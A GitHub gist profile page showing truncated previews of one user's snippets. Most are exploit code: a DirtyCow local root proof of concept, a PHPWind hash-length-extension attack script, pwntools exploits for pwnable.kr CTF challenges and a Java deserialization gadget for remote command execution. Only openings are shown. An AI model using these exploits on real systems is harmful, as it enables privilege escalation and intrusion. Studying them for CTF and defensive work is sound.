Skip to content

Instantly share code, notes, and snippets.

View RickGray's full-sized avatar

R1ckGr3y RickGray

403 followers · 52 following
View GitHub Profile
@RickGray
RickGray / zgrab-mini-demo.go
Last active April 21, 2017 09:59
go tutorial "zgrab" simple code.
package main
import (
"bufio"
//"crypto/tls"
"encoding/json"
"flag"
"fmt"
"io"
"net"
@RickGray
RickGray / cowroot.c
Created October 24, 2016 09:12 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@RickGray
RickGray / GIF-Screencast-OSX.md
Created September 22, 2016 05:19 — forked from dergachev/GIF-Screencast-OSX.md
OS X Screencast to animated GIF

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

@RickGray
RickGray / phpwind_hash_length_extension_attack.py
Created May 26, 2016 07:13
PHPWind Hash-Length-Extension-Attack
#!/usr/bin/env python
# author: RickGray
# update: 2016-05-25
# >>>>>>>>>>>
# requests, hashpumpy modules required
# : pip install requests hashpumpy
import re
import json
import time
@RickGray
RickGray / login_exp.py
Created March 2, 2016 09:48
http://pwnable.kr/ [simple login]
#!/usr/bin/env python
# coding: utf-8
from pwn import *
p = process('./login')
ebp_over = 0x0811EB40
pp_system = 0x08049284
payload = b64e('A' * 4 + p32(pp_system) + p32(ebp_over))
@RickGray
RickGray / hash_exp.py
Last active March 16, 2017 20:57
http://pwnable.kr/ [md5 calculator]
#!/usr/bin/env python
# coding: utf-8
import os
import re
import time
import random
import urllib2
from pwn import *
@RickGray
RickGray / bf_exp.py
Last active March 16, 2017 20:58
http://pwnable.kr/ [brain fuck]
#!/usr/bin/env python
# coding: utf-8
from pwn import *
# Remote EXP
libc = ELF('./bf_libc.so')
p = remote('pwnable.kr', 9001)
# Local EXP
@RickGray
RickGray / sqlpwn.php
Created January 10, 2016 17:31 — forked from orangetw/sqlpwn.php
AIS3 Final CTF Web
<?php
/*
sqlpwn by orange
Don't brute force or you will be banned !
*/
session_start();
error_reporting(0);
include "template.html";
@RickGray
RickGray / CommonsCollectionPOPGadget.java
Created November 25, 2015 14:43
Property-oriented gadget in Java to remote command execution exploits through deserialization.
package exserial.payloads;
import java.io.ObjectOutputStream;
import java.util.Map;
import java.util.HashMap;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
@RickGray
RickGray / github.css
Created October 28, 2015 09:21 — forked from theconektd/github.css
Github Markdown CSS - for Markdown Editor Preview
body {
font-family: Helvetica, arial, sans-serif;
font-size: 14px;
line-height: 1.6;
padding-top: 10px;
padding-bottom: 10px;
background-color: white;
padding: 30px; }
body > *:first-child {